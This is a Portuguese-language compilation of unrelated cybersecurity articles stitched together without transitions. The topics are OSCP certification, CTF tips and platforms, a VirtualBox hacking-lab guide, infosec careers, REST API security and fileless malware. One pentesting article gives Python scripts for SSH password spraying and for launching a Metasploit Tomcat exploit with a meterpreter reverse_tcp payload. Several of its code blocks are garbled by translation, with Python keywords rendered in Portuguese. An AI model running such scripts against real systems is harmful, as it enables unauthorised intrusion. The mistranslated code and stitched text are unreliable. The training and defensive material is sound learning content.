Ao contrário de algumas certificações profissionais, não há pré-requisitos educacionais ou de experiência profissional para fazer o exame OSCP.

A OffSec sugere que os candidatos tenham sólidos conhecimentos de redes TCP/IP, experiência razoável em administração de Windows e Linux e familiaridade com scripts básicos em Bash ou Python. Os candidatos fazem o exame como parte final do curso de treinamento da OffSec. 

Estudantes ou profissionais que consideram a certificação OSCP devem ser solucionadores de problemas e pensadores analíticos. A OffSec elaborou o curso preparatório e o exame para testar a capacidade dos candidatos de aplicar o pensamento crítico à resolução de problemas. 

Quanto custa a certificação OSCP?

O exame PWK e sua certificação, o OSCP, são oferecidos pela OffSec como parte do curso de treinamento PEN-200. O curso individual autoguiado PEN-200 custa US$ 1.499. Inclui 90 dias de acesso ao laboratório e uma tentativa de exame.

A assinatura Learn One custa US$ 2.499/ano e oferece acesso ao laboratório por um ano e duas tentativas de exame. A assinatura Learn Unlimited custa US$ 5.499/ano e inclui todos os cursos da Biblioteca de Treinamento OffSec, além de tentativas de exame ilimitadas.

Se você é apaixonado por cibersegurança e deseja colocar suas habilidades em prática, os desafios de Capture The Flag (CTF) são o ponto de partida ideal. Esses desafios simulam cenários reais de segurança, oferecendo a oportunidade de aprender, explorar e resolver problemas complexos de forma interativa. No entanto, para quem está começando, o universo dos CTFs pode parecer intimidador.

Este guia foi criado para ajudá-lo a dar seus primeiros passos com confiança. Aqui, você encontrará um plano claro e prático com 10 passos essenciais para enfrentar seu primeiro desafio CTF, desde a escolha da plataforma ideal até o desenvolvimento de habilidades técnicas e estratégias eficazes. Prepare-se para mergulhar nesse mundo empolgante e desbloquear o hacker ético que há em você!

10 Passos Para Resolver Seu Primeiro Desafio CTF

Escolha uma Plataforma para Iniciantes
Opte por plataformas como TryHackMe, Hack The Box (modo iniciante) ou PicoCTF, que oferecem desafios progressivos e tutoriais para aprender enquanto pratica.

Entenda o Formato do CTF
Certifique-se de saber o tipo de desafio (jeopardy, ataque/defesa ou forense) e o escopo permitido para exploração.

Configure um Ambiente Seguro
Prepare um laboratório virtual com Kali Linux ou Parrot OS e ferramentas como Nmap, Wireshark e John the Ripper. Use máquinas virtuais para isolamento.

Estude Conceitos Básicos de Redes
Compreenda protocolos como HTTP, FTP e SSH, pois muitos desafios envolvem análise de rede ou exploração de serviços.

Explore Serviços e Portas
Use o Nmap para identificar portas abertas e serviços ativos. Ferramentas como Netcat também são úteis para testes em serviços de rede.

Familiarize-se com Ferramentas de Enumeração
Ferramentas como Gobuster ou Dirb ajudam a descobrir diretórios ocultos e arquivos expostos, essenciais em desafios de web.

Aprenda a Analisar Binários
Use ferramentas como Strings e Ghidra para inspecionar binários e descobrir pistas escondidas ou funções vulneráveis.

Pratique Decodificação e Criptografia
Desafios frequentemente incluem dados criptografados ou codificados. Ferramentas como CyberChef e comandos simples em Python podem ajudar.

Desenvolva Habilidades de Scripting
Automatize tarefas repetitivas ou analise dados com scripts simples em Python, Bash ou PowerShell, dependendo do desafio.

Leia Write-Ups e Aprenda com a Comunidade
Após o desafio, consulte write-ups de outros participantes. Isso ajuda a entender diferentes abordagens e expandir suas habilidades.

O teste de penetração, frequentemente chamado de hacking ético, é um aspecto vital da segurança cibernética. É o processo de identificar e explorar vulnerabilidades em um sistema para protegê-lo contra ameaças potenciais. Embora existam inúmeras ferramentas disponíveis para testes de penetração, o Python continua sendo o favorito entre os testadores de penetração devido à sua versatilidade, facilidade de uso e um rico ecossistema de bibliotecas e frameworks. Neste artigo, vamos nos aprofundar em técnicas avançadas de script em Python para testadores de penetração e fornecer alguns scripts úteis para aprimorar seu fluxo de trabalho.

Técnicas avançadas de script Python

1. Programação de soquetes para exploração de rede:
2. A biblioteca Python socketpermite que testadores de penetração criem ferramentas de rede personalizadas para diversas tarefas, como varredura de portas, captura de banners ou até mesmo a criação de exploits personalizados. Ao usar a programação por sockets, você obtém controle refinado sobre as interações de rede.
3. Aqui está um script Python simples para executar um banner grabber:

import socket 

target = "example.com"
 port = 80 

def  banner_grab ( target, port ): 
    try : 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        s.connect((target, port)) 
        banner = s.recv( 1024 ) 
        print ( "[+] Banner: " + banner.decode().strip()) 
        s.close() 
    except Exception as e: 
        print ( "[-] Erro: " + str (e)) 

banner_grab(target, port)

• Web Scraping para Reconhecimento:
• As bibliotecas de web scraping do Python requestssão BeautifulSoupinestimáveis ​​para coletar informações de sites. Testadores de penetração podem usar web scraping para coletar dados, como endereços de e-mail, subdomínios ou vazamento de informações confidenciais, que podem ser cruciais para um ataque.
• Aqui está um script Python para extrair endereços de e-mail de uma página da web:

importar solicitações 
do bs4 importar BeautifulSoup 
importar re 

url = "https://example.com" 

def  scrape_emails ( url ): 
    resposta = requests.get(url) 
    soup = BeautifulSoup(response.text, 'html.parser' ) 
    emails = re.findall( r'\S+@\S+' , soup.get_text()) 
    retornar  definir (emails) 

email_set = scrape_emails(url) 
para email em email_set: 
    print ( "[+] E-mail encontrado: " + email)

• Automatizando Exploits com a API Metasploit:
• O Metasploit Framework é uma ferramenta popular de teste de penetração que permite automatizar o processo de exploração. Você pode interagir com o Metasploit usando sua API REST em Python, permitindo que você crie scripts para a exploração de vulnerabilidades.
• Para usar a API Metasploit em Python, você pode instalar a msfrpcbiblioteca e criar scripts para automatizar tarefas de exploração.

de msfrpc importar MsfRpcClient 

# Conectar ao servidor Metasploit RPC
 cliente = MsfRpcClient ( 'seu_ip_metasploit' , porta = 55553 ) 

# Listar exploits disponíveis
 exploits = client.modules.exploits 
para exploit em exploits: 
    print ( "[+] Exploit: " + exploit) 

# Executar um exploit
 exploit = ​​exploits. use ( 'exploit/multi/http/tomcat_mgr_upload' ) 
exploit[ 'RHOSTS' ] = 'ip_alvo'
 exploit. execute (payload = 'payload/meterpreter/reverse_tcp' )

Scripts Python úteis para testes de penetração

1. Script de enumeração de subdomínio:
2. A enumeração de subdomínios é uma parte crucial do reconhecimento. O script a seguir utiliza o subprocessmódulo para executar a popular ferramenta Sublist3rde descoberta de subdomínios:

importar subprocesso 

domínio = "exemplo.com" 

def  enumerate_subdomains ( domínio ): 
    tentar : 
        subprocess.run([ "python3" , "Sublist3r.py" , "-d" , domínio]) 
    exceto Exceção como e: 
        print ( "[-] Erro: " + str (e)) 

enumerate_subdomains(domínio)

• Script de pulverização de senhas:
• A pulverização de senhas é uma técnica usada para testar senhas fracas em várias contas. O seguinte script Python usa a paramikobiblioteca para automatizar a pulverização de senhas via SSH:

importar paramiko 

target = "ssh.example.com"
 nome de usuário = "usuário"
 senhas = [ "senha1" , "senha2" , "senha3" ] 

def  password_spray ( target, nome de usuário, senhas ): 
    para senha em senhas: 
        tente : 
            ssh = paramiko.SSHClient() 
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 
            ssh.connect(target, nome de usuário=nome de usuário, senha=senha) 
            print ( "[+] Senha encontrada: " + senha) 
            ssh.close() 
            break 
        except paramiko.AuthenticationException: 
            print ( "[-] Senha incorreta: " + senha) 
        except Exception as e: 
            print ( "[-] Erro: " + str (e)) 

password_spray(target, nome de usuário, senhas)

Conclusão

Python é uma ferramenta indispensável para testadores de penetração, oferecendo a flexibilidade necessária para criar scripts personalizados e automatizar diversas tarefas durante o processo de teste. Os scripts mencionados neste artigo são apenas a ponta do iceberg; os recursos do Python são vastos e limitados apenas pela sua criatividade e pelas necessidades dos seus testes de penetração. Ao dominar essas técnicas avançadas de script em Python, você pode aumentar sua eficácia como testador de penetração e fortalecer seus esforços de segurança cibernética. Boas atividades de hacking!

A cibersegurança não é apenas um mundo fascinante e em constante evolução, mas também pode ser divertida. E muito disso tem a ver com os Capture The Flag (CTFs).

Mas afinal, o que são os CTFs? São competições criadas para testar conhecimentos e habilidades em hacking, por meio de desafios em diversos níveis de dificuldade, com o objetivo de capturar a flag ou código que confirma que o desafio foi resolvido corretamente.

Esses jogos podem ser enfrentados individualmente ou em grupo, e a quantidade de pontos obtidos em cada desafio dependerá de sua complexidade, do tempo utilizado para resolvê-lo e da quantidade de pessoas no time. Entre as principais categorias estão: engenharia reversa, criptografia, análise forense, segurança web, OSINT (inteligência de código aberto) e exploração. Quanto às modalidades, podem ser por pontuação, jogos de guerra (ataque e defesa) ou mistos.

A seguir, apresentamos 5 sugestões para que você possa continuar se desenvolvendo enquanto se diverte resolvendo CTFs.

CryptoHack

“Uma plataforma divertida e gratuita para aprender criptografia moderna”. Assim se define o CryptoHack, um site que oferece diversos desafios interativos relacionados à quebra de protocolos. Além disso, por meio de troféus e níveis de competição, busca incentivar o progresso constante.

Que tipos de desafios esse jogo oferece? Desde o download de código-fonte vulnerável para determinar como decifrar o resultado, fazer solicitações da web a um servidor e extrair dados confidenciais lentamente, até a conexão a uma porta para realizar um ataque man-in-the-middle entre duas partes que tentam se comunicar. Embora a maioria dos desafios envolva a codificação de uma pequena solução, também fornecem trechos de código-fonte Python que podem ser adaptados aos objetivos de cada participante.

Hack The Box

O Hack The Box permite que indivíduos, empresas, órgãos governamentais e universidades aprimorem seus conhecimentos em segurança ofensiva e defensiva. Ele oferece uma seção de exercícios CTF que inclui desafios do tipo Jeopardy (em segurança web, criptografia, reversão e análise forense), bem como máquinas com diferentes dificuldades, caminhos de ataque e sistemas operacionais. Além disso, possui laboratórios de Active Directory que simulam ambientes empresariais reais com as últimas técnicas de ataque.

O site é extremamente popular, com mais de 500 CTFs organizados, a participação de quase 60 mil equipes e a entrega bem-sucedida de mais de 200 mil flags.

RingZer0 Team Online CTF

A RingZer0 disponibiliza mais de 400 exercícios CTF de diversas dificuldades, que abrangem desde esteganografia e criptografia até reversão e programação. Eles incentivam ativamente a participação da comunidade, encorajando os participantes a enviar uma descrição para cada desafio concluído com sucesso. Uma vez aprovado, isso pode ser trocado por dicas. O principal objetivo desse jogo é motivar as pessoas a compartilhar como resolveram seus desafios e demonstrar que há muitas maneiras de superar um mesmo desafio.

TryHackMe

O TryHackMe oferece uma plataforma de treinamento com conteúdos que abrangem todos os níveis de habilidade, desde iniciantes até hackers experientes. Eles propõem reforçar os conhecimentos em segurança da informação por meio de várias tarefas e desafios baseados em objetivos específicos. O site possui itinerários bem estruturados e uma comunidade ativa de estudantes e profissionais de cibersegurança que compartilham conhecimentos para enriquecimento mútuo.

Desafios ESET

No WeLiveSecurity, há uma categoria de publicações voltada aos CTFs, apresentando diversos desafios criados por especialistas do Laboratório da ESET América Latina, com a apresentação posterior de suas resoluções. Os desafios incluem atividades como descobrir se estão extraindo informações de uma empresa, realizar engenharia reversa sem analisar código ou analisar amostras para descobrir a distribuição de malware dentro de uma organização. A comunidade contribui com comentários, opiniões e perguntas, enriquecendo ainda mais o treinamento e a aprendizagem.

Estas são apenas algumas de nossas sugestões. Certamente, existem muitas outras opções para você praticar e aprender através do mundo divertido e desafiador dos CTFs.

O hacking ético envolve testar e encontrar vulnerabilidades em sistemas. Mas fazer isso em redes ativas ou servidores públicos pode levar a danos acidentais.

Montar um laboratório virtual para hackear é uma ótima maneira de aprimorar suas habilidades em um ambiente seguro. Um laboratório privado garante que todas as suas atividades permaneçam isoladas, evitando o risco de danificar sistemas reais ou violar os limites legais. Isso permite que você cometa erros e aprenda com eles sem causar danos.

Configuração do projeto

Este guia ensinará como configurar seu próprio laboratório particular. Para isso, precisaremos de três coisas:

• Software de virtualização
• Máquina de Ataque
• Máquina alvo

O software de virtualização permite que um computador físico execute várias máquinas virtuais (VMs). Uma máquina virtual atua como um computador separado, com seu próprio sistema operacional e programas, mas roda no mesmo hardware que o computador host.

O VirtualBox é um software de virtualização popular. O VMware é outra alternativa.

Para praticar hacking, você precisa de duas máquinas: uma máquina de ataque e uma máquina de destino.

Você pode usar seu próprio sistema como máquina de ataque. Mas é melhor usar uma máquina como Kali ou Parrot , que já vem pré-instalada com todas as ferramentas necessárias.

Para a máquina alvo, podemos usar um repositório como o Vulnhub. Ele contém diversas VMs criadas para você praticar suas habilidades. Cada uma delas foi projetada para ter uma vulnerabilidade que você pode explorar.

Os downloads necessários para esta configuração são bem grandes, então recomendo que você os baixe e os mantenha à mão.

• Baixe o VirtualBox (baixe também o pacote de extensão)
• Baixe Kali (imagem do Virtualbox de 64 bits)
• Baixe o Mr Robot, máquina vulnerável

Vamos lá 👉

Como instalar o VirtualBox

Para baixar o VirtualBox, acesse a página de downloads . Dependendo do seu sistema operacional, baixe o pacote e instale-o.

Quando a instalação estiver concluída, você verá uma página semelhante, dependendo do seu sistema operacional.

Clique duas vezes no pacote de extensão e certifique-se de que ele também esteja instalado.

Como instalar o Kali Linux

Agora vamos instalar nossa máquina de ataque. Extraia o arquivo .7z do download do Kali Linux. Em seguida, clique no ícone verde “Adicionar” na interface do VirtualBox e aponte para o arquivo .vbox.

Todas as configurações padrão serão aplicadas e você deverá ter a máquina de ataque instalada. Se tiver algum problema, você pode encontrar instruções detalhadas aqui .

Não inicie a máquina ainda. Vamos adicionar a máquina alvo também, e depois alterar algumas configurações de rede. Depois, podemos começar a hackear.

Como instalar uma VM de destino

Agora vamos instalar o alvo. Clique duas vezes no mrRobot.ovaarquivo baixado. Use as configurações padrão e clique em “Concluir”.

Depois que as máquinas de ataque e alvo estiverem configuradas, você deverá vê-las na lista de máquinas.

Agora vamos atualizar as configurações de rede para garantir que nossas VMs estejam seguras.

Atualizar configurações de rede

Existem muitas maneiras de configurar uma rede no VirtualBox. Mas, no nosso caso, queremos isolar nosso laboratório da internet pública. A melhor maneira de fazer isso é configurar uma rede somente para host.

Em uma rede somente host, as VMs podem se comunicar entre si, mas não com a internet pública. Vamos configurar.

Na interface do Virtualbox, clique em “Ferramentas” e em “Redes somente para hosts”. Em seguida, clique em “Criar”. Uma rede somente para hosts será criada automaticamente com um intervalo de IP. Para simplificar, vamos alterar o nome da rede para “MyHackingLabNetwork”.

Clique em “Aplicar”. Agora temos uma rede somente host. Em seguida, vamos configurar nossas máquinas virtuais para se conectar a essa rede.

Clique na Máquina Virtual e no ícone “Configurações”. Em “Rede”, escolha “rede somente host” e escolha o nome “MyHackingLabNetwork”. Clique em “OK” quando terminar.

Faça o mesmo para a máquina de destino. Os endereços IP dessas máquinas virtuais serão atribuídos automaticamente pela nossa rede “somente host”.

Escaneando o alvo

Agora estamos prontos para começar. Ligue as duas máquinas.

Observação: Ambas as máquinas exibirão uma opção padrão para inicialização – basta pressionar Enter. Se a VM parecer pequena na tela, clique em Exibir -> Modo Escalado no menu superior.

O nome de usuário e a senha para a máquina Kali é “kali”.

Você deverá ver a interface do Kali Linux como abaixo.

Para a caixa Mr.Robot, você deverá ver a seguinte interface de usuário:

Agora vamos encontrar os endereços IP dessas máquinas.

No Kali, abra um terminal e digite ifconfig | grep inet.

Você deverá ver um endereço IP semelhante a 192.168.56.x. Este é o IP da máquina de destino.

Agora, vamos usar o nmap para procurar outras máquinas nesta rede. Se você não sabe o que é o Nmap, aqui está um tutorial .

Vamos executar um ping scan no Kali para procurar outras máquinas na rede. Execute o seguinte comando:

nmap -sn 192.168.56.0/24

Este comando executa um ping em todos os endereços IP de 192.168.56.1para 192.168.56.254para ver o que está funcionando. Você deverá ver três resultados semelhantes.

O primeiro resultado geralmente é o IP do adaptador. Portanto, podemos ignorá-lo. Dos dois, um deles é o IP da nossa máquina de ataque. Estamos interessados ​​no terceiro. Neste caso, é 192.168.56.3.

Vamos fazer uma varredura da versão de serviço deste IP e ver o que acontece.

nmap -sV 192.168.56.3

Você deverá ver um resultado semelhante ao abaixo se estiver escaneando a máquina virtual Mr.Robot:

A imagem acima mostra que há três portas no servidor. Uma delas é ssh, que está fechada. As outras duas são portas do servidor web – 80 para http e 443 para https.

Conclusão

Parabéns! Você montou com sucesso seu próprio laboratório de hacking usando a VMware. Este laboratório oferece a flexibilidade necessária para praticar hacking ético em um ambiente controlado e isolado.

No momento que é crucial proteger os dados dos negócios contra cyber criminosos e tentativas de violação, há uma necessidade significativa de profissionais de segurança da informação que podem ajudar a manter a infraestrutura de TI de uma organização segura. Manter aplicativos e dados críticos inacessíveis a usuários não autorizados, mantendo o malware sob controle, evitando danos físicos e lógicos aos sistemas e ativos de informações de proteção contra phishing e ransomware, todos exigem não apenas a conscientização dos usuários sobre essas ameaças, mas também a capacidade dos profissionais de segurança da informação de mitigar esses riscos.

Seja por meio de profissionais de TI internos ou através da ajuda de empresas de consultoria, todas as empresas acabam precisando da experiência de um profissional ou  equipe de segurança da informação que possa avaliar os riscos e a segurança das informações ao longo do tempo. Os funcionários experientes e qualificados são muito procurados pelos empregadores, mas muitas organizações também investem no treinamento de funcionários atuais e profissionais de nível básico que podem estar preparados para atender às necessidades específicas do negócio e, ao mesmo tempo, desenvolver uma lealdade mais forte.

Pensando em uma carreira na Segurança da Informação?

Então, se você está interessado em uma carreira em segurança da informação ou quer avançar em sua carreira já estabelecida, este pode ser o melhor momento. A atual lacuna de habilidades em TI e a expansão do cenário de ameaças na verdade oferecem grandes oportunidades para novos profissionais prontos para mergulhar e enfrentar os desafios dessa nova era. Posições que muitas vezes são anunciadas como:

• Gerente de segurança;
• Administrador de segurança;
• Consultor de segurança;
• Analista de segurança;
• Engenheiro de segurança ou arquiteto de segurança.

Com a demanda atualmente bem acima da oferta, até profissionais não técnicos estão começando a olhar para a possibilidade de mudar de área e aprenderem a apoiar a criação de infraestruturas adequadas e a implementação de medidas de segurança.

Espera-se que as oportunidades de segurança de TI cresçam; Embora as ferramentas automatizadas tenham se tornado cada vez mais sofisticadas e capazes de ajudar a proteger a infraestrutura, elas seriam ineficazes sem a configuração adequada dos sistemas, a capacidade de análise e as habilidades de controle de danos dos profissionais.

Caminhos da carreira

Os profissionais de segurança da informação vêm de muitos caminhos diferentes. Há algumas carreiras que um profissional ou recém-formado pode considerar: desde as mais gerais, incluindo especialistas de suporte, técnicos de TI, help desk, administradores de rede e sistemas até programadores de computador ou bancos de dados e analistas de dados. Em geral, é importante obter um bom conhecimento geral dos sistemas primeiro, de modo a estar pronto para protegê-los de forma eficiente. Trabalhos em configuração de sistemas e suporte ou até mesmo estágios para graduados são excelentes maneiras de obter o conhecimento básico necessário para iniciar uma carreira em segurança da informação.

Certificações

Elas são uma parte importante de uma carreira em Segurança da Informação.

A certificação CompTIA Security + , por exemplo, constrói uma compreensão fundamental da segurança da informação, testa as habilidades nas principais funções de segurança e permite que um profissional progrida para funções intermediárias.

Para progredir em funções especializadas, CISSP ou CISM são ótimas opções para impulsionar uma carreira e aumentar os ganhos.

O CISSP é uma qualificação de elite que comprova uma base sólida em segurança digital e na concepção e implementação de programas de segurança eficazes; O CISM é voltado para profissionais que procuram se mudar para posições gerenciais.

Vamos dar uma olhada em apenas algumas das carreiras específicas a serem consideradas no âmbito da segurança da informação.

Arquiteto de segurança

Um arquiteto de segurança garante a segurança dos sistemas, trabalhando com hardware e software, bem como elaborar políticas e protocolos apropriados e preparando contramedidas. Suas ações são voltadas para a prevenção de ataques e intrusões de hackers. Esses profissionais ocupam altos cargos com (normalmente) salários de seis dígitos e, portanto, têm experiência proporcional às suas tarefas, começando com graduações formais em TI, cargos em administração de sistemas ou de rede e vários cursos de treinamento e certificações que se comprovam atualizados. conhecimento. Estes geralmente incluem CISSP e / ou opções de ethical hacking .

Consultor de Segurança

Muitas vezes, contratados, consultores de segurança são profissionais que são solicitados a trabalhar em conjunto com outros especialistas em TI (normalmente equipes internas) para identificar problemas em redes e arquiteturas de TI e elaborar soluções. Estes são profissionais que não só têm sólida experiência em TI, mas que também habilidades como comunicação e criatividade, que os ajudam em suas interações diárias com os clientes e na preparação de documentação e relatórios. Esses profissionais normalmente têm diplomas formais, mas a experiência prática é um pré-requisito importante; eles geralmente têm análise de segurança ou experiência de auditoria em seu portfólio.

Diversas certificações ajudam esses profissionais a progredir em suas carreiras. Depois das óbvias certificações para iniciantes como CompTIA Security +, eles podem se especializar através da CEH: Certified Ethical Hacker, CISSP: Certified Information Systems Security Professional, CHFI: Certified Hacking Forensic Investigator, CPT: Certified Penetration Tester, CySA +: Cybersecurity Analyst, CWAPT: Certified Web Application Penetration Tester e CREA: Certified Reverse Engineering Analyst, bem como certificação em auditoria e análise de sistemas (ECSA, CISA, CISM).

Chief Information Security Officer (CISO)

Um profissional sênior e de nível executivo, o CISO está à frente das equipes de segurança e aprova a maioria das ações tomadas em relação à segurança: desde a aprovação das escolhas de projeto para os sistemas até as políticas e os planos de recuperação. Ele ou ela também realiza auditorias, realiza treinamento, supervisiona diretamente os membros da equipe e supervisiona os contratados.

É óbvio que, para obter essa posição, um profissional de TI precisa ter anos de experiência relevante – não apenas como especialista em TI no campo da segurança, mas também como supervisor. A educação formal é normalmente necessária e um MBA é muitas vezes fundamental. Certificações avançadas devem incluir certificações de auditor e gerenciadores de segurança, incluindo CISM, ISSM, CGEIT e CISSP.

As habilidades essenciais

Os profissionais de Segurança da Informação precisam possuir a combinação certa de habilidades para progredir em sua carreira. As habilidades técnicas precisam incluir a capacidade de realizar análises de segurança, testes de invasão, nuvem e aplicativos seguros, para citar alguns. Um profissional nesta área que se eleva para cargos de alto escalão precisa de excelentes habilidades de comunicação para lidar efetivamente com as partes interessadas e possuir grande capacidade de colaboração para trabalhar com diferentes seções de TI de uma empresa, bem como usuários e gerentes de outras seções internas do cliente. Criatividade e capacidade de pensar fora da caixa também são elementos importantes, devido à necessidade de antecipar os movimentos dos adversários e surpreendê-los com contramedidas inovadoras.

Mas acima de tudo, ele ou ela precisa possuir uma verdadeira paixão pelo desenvolvimento profissional. Manter as habilidades e o conhecimento atualizados é fundamental em um campo que está em constante desenvolvimento e onde é essencial permanecer relevante em um mercado de trabalho que muda rapidamente.

Conclusão

Os profissionais de Segurança da Informação, como os profissionais de segurança cibernética, trabalham em empresas de todos os portes e setores para proteger as organizações contra violações e ataques de dados. O déficit de habilidades de hoje em dia, assim como a escassez de mão de obra em segurança cibernética, está causando uma pressão sobre a força de trabalho existente e sobre as empresas que procuram contratar profissionais que possam garantir seus ativos. E com tantos empregos não preenchidos, como pode ser visto nas inúmeras vagas abertas ao redor do mundo, abordar a lacuna e a falta de habilidades envolve a educação da próxima geração de profissionais de segurança de TI capazes que se tornaram essenciais.

Novos graduados e profissionais devem procurar entrar na área de TI ou lançar uma carreira em segurança cibernética não apenas pelas muitas oportunidades que agora oferece, mas também pela promessa de uma carreira em evolução contínua à medida que a tecnologia avança. Isto é especialmente verdadeiro para o mercado de trabalho de segurança. Há muitas credenciais que os profissionais de segurança podem buscar para mostrar aos possíveis empregadores que suas habilidades são novas. As empresas freqüentemente procuram novos membros da equipe com certificações que provem que possuem expertise em áreas como o “lado técnico” da segurança de TI; Embora o conhecimento teórico seja obviamente importante, a prova de noções atualizadas e experiência prática é ainda mais valorizada.

À medida que as aplicações dependem cada vez mais de serviços web para troca de dados e funcionalidades, a segurança desses serviços torna-se primordial. A Transferência de Estado Representacional (REST) ​​é um estilo arquitetônico popular para o design de serviços web. As APIs REST servem como a espinha dorsal da comunicação entre clientes e servidores em uma arquitetura RESTful.

Neste artigo, exploraremos a segurança da API REST, discutiremos sua importância e destacaremos as melhores práticas para proteger seus dados e recursos.

O que é segurança de API REST?

A segurança da API REST refere-se às medidas de proteção implementadas para impedir acesso não autorizado, violações de dados e outros riscos de segurança em sistemas que dependem de serviços web RESTful. Envolve o estabelecimento de mecanismos robustos de autenticação e autorização, a validação de dados de entrada, a proteção de informações confidenciais e a garantia de comunicação segura entre clientes e servidores.

A segurança da API REST abrange várias camadas, incluindo segurança de rede, autenticação, controle de acesso, validação de entrada, criptografia e muito mais. Ao abordar cada uma dessas camadas, as organizações podem construir APIs REST seguras e resilientes, protegendo seus dados e garantindo a integridade de seus sistemas.

Importância da segurança da API REST

Medidas de segurança adequadas para APIs REST são essenciais porque:

1. Prevenção de acesso não autorizado : APIs REST frequentemente expõem recursos críticos e dados sensíveis. Sem segurança adequada, usuários não autorizados podem obter acesso a informações sensíveis ou manipular recursos do sistema, levando a violações de dados, interrupções de serviço ou até mesmo perdas financeiras.
2. Proteção da Integridade dos Dados : APIs REST gerenciam trocas de dados entre clientes e servidores. Garantir a integridade desses dados é vital para evitar adulterações, ataques de injeção ou modificações não autorizadas que possam comprometer a confiabilidade e a precisão das informações.
3. Mitigação de Ataques de Negação de Serviço (DoS) : APIs REST são frequentemente submetidas a ataques de negação de serviço, nos quais solicitações excessivas sobrecarregam o servidor e interrompem sua disponibilidade. Ao implementar medidas de segurança adequadas, incluindo limitação de taxa e monitoramento de tráfego, as organizações podem prevenir ou mitigar esses ataques.
4. Conformidade com os Padrões Regulatórios : Muitos setores possuem regulamentações para garantir a segurança e a privacidade dos dados dos usuários. Ao implementar medidas adequadas de segurança para APIs REST, as organizações podem atender a esses requisitos de conformidade e construir confiança com seus clientes.

Melhores práticas para segurança de API REST

Para garantir a segurança da sua API REST, considere implementar as seguintes práticas recomendadas:

1. Autenticação e Autorização

• Utilize mecanismos de autenticação fortes , como tokens de portador, OAuth ou JSON Web Tokens (JWT).
• Empregue controles de acesso granulares para restringir o acesso a determinados recursos ou ações dentro da API.
• Implemente um gerenciamento de usuários robusto e aplique práticas de segurança de senhas.

2. Comunicação Segura

• Proteja o canal de comunicação usando HTTPS/SSL/TLS para criptografar dados em trânsito.
• Desabilite protocolos de comunicação inseguros, como HTTP, e imponha conexões seguras.

3. Validação e Sanitização de Dados

• Valide e higienize todos os dados de entrada e parâmetros para evitar ataques de injeção, como injeção de SQL ou cross-site scripting (XSS).
• Implemente verificações de validação de entrada adequadas para garantir a integridade dos dados e proteger contra cargas maliciosas.

4. Limitação e limitação de taxa

• Implemente a limitação de taxa para controlar o número de solicitações de um cliente dentro de um determinado período, evitando abusos ou ataques DoS.
• Aplique a limitação para limitar o número de solicitações que um cliente pode fazer em um determinado período, garantindo a alocação justa de recursos.

5. Tratamento e registro de erros

• Implemente mecanismos seguros de tratamento de erros para evitar que informações confidenciais sejam expostas em respostas de erro.
• Habilite o registro detalhado das atividades da API e monitore os registros para identificar possíveis incidentes ou anormalidades de segurança.

6. Armazenamento seguro de credenciais e segredos

• Armazene e gerencie com segurança credenciais e chaves de API utilizando sistemas seguros de gerenciamento de credenciais, como cofres de chaves ou bancos de dados criptografados.
• Evite codificar credenciais na base de código para evitar exposição acidental.

7. Testes e auditorias regulares de segurança

• Realize testes de segurança regulares , incluindo avaliações de vulnerabilidade e testes de penetração, para identificar e corrigir quaisquer fraquezas ou vulnerabilidades.
• Realize auditorias de segurança para garantir a conformidade com os padrões e as melhores práticas do setor.

8. Implementando o Controle de Acesso Baseado em Funções (RBAC)

O RBAC permite o controle preciso das permissões de usuário e dos níveis de acesso a diferentes recursos dentro da API. Ao atribuir funções com base nas responsabilidades do usuário, as organizações podem garantir que apenas indivíduos autorizados possam acessar e manipular recursos específicos.

9. Implementando a autenticação de dois fatores (2FA)

A autenticação de dois fatores adiciona uma camada extra de segurança ao exigir que os usuários forneçam uma segunda forma de verificação, como um código enviado ao dispositivo móvel, além do nome de usuário e da senha. Isso ajuda a mitigar o risco de acesso não autorizado, mesmo que as credenciais do usuário sejam comprometidas.

10. Atualizações regulares e gerenciamento de patches

Manter a API REST e todos os componentes relacionados atualizados é crucial para manter a segurança. As atualizações geralmente incluem correções de bugs e patches de segurança que abordam vulnerabilidades recém-descobertas. É essencial aplicar atualizações regularmente a todos os componentes de software envolvidos na API para garantir que as medidas de segurança mais recentes estejam em vigor.

11. Gateway de segurança de API

A implementação de um gateway de segurança de API pode fornecer uma camada adicional de proteção para APIs REST. Esses gateways atuam como um ponto centralizado para autenticação, autorização e validação de solicitações de API. Eles podem aplicar políticas de segurança, controlar o acesso e fornecer recursos de registro e auditoria.

Exemplo do mundo real: protegendo uma API REST bancária

Imagine uma instituição bancária que fornece uma API REST para facilitar os serviços de conta para seus clientes. Para garantir transações seguras e proteger os dados dos clientes, o banco implementa rigorosas medidas de segurança para a API REST. Eles utilizam OAuth para autenticação, impondo senhas fortes e implementando controles de acesso baseados em funções. A API é protegida por HTTPS, e todos os dados inseridos são cuidadosamente validados e higienizados para evitar qualquer tipo de ataque de injeção. As respostas para tratamento de erros são cuidadosamente elaboradas para evitar o vazamento de informações confidenciais. Testes e auditorias de segurança regulares são realizados para identificar e mitigar quaisquer vulnerabilidades potenciais.

Conclusão

A segurança da API REST é vital para proteger a integridade dos dados, impedir acessos não autorizados e garantir a conformidade com os padrões regulatórios. Seguindo as melhores práticas e implementando mecanismos de segurança robustos, as organizações podem proteger suas APIs REST, salvaguardando seus dados e garantindo a integridade de seus sistemas.

Malware sem arquivo é um tipo de atividade maliciosa que utiliza ferramentas nativas e legítimas incorporadas a um sistema para executar um ataque cibernético. Ao contrário do malware tradicional , que normalmente exige o download e a instalação de um arquivo, o malware sem arquivo opera na memória ou manipula ferramentas nativas, dificultando sua detecção e remoção. A exploração de ferramentas legítimas é frequentemente chamada de ” living off the land” (LOTL).

Técnicas comuns de malware sem arquivo

Embora os invasores não precisem instalar código para iniciar um ataque de malware sem arquivo, eles ainda precisam obter acesso ao ambiente para que possam modificar suas ferramentas nativas de acordo com seus propósitos. Os invasores podem obter acesso usando:

• Kits de exploração
• Malware residente no registro
• Malware somente de memória
• Ransomware sem arquivo

Kits de exploração

Exploits são trechos de código, sequências de comandos ou coleções de dados, e kits de exploit são coleções de exploits. Os invasores usam essas ferramentas para explorar vulnerabilidades conhecidas em um sistema operacional ou aplicativo instalado.

Exploits são uma maneira eficiente de lançar um ataque de malware sem arquivo, pois podem ser injetados diretamente na memória sem exigir que nada seja gravado em disco. Os invasores podem usá-los para automatizar os comprometimentos iniciais em larga escala.

Os kits de exploração geralmente incluem exploits para diversas vulnerabilidades e um console de gerenciamento que o invasor pode usar para controlar o sistema. Em alguns casos, o kit de exploração inclui a capacidade de escanear o sistema alvo em busca de vulnerabilidades e, em seguida, criar e lançar um exploit personalizado imediatamente.

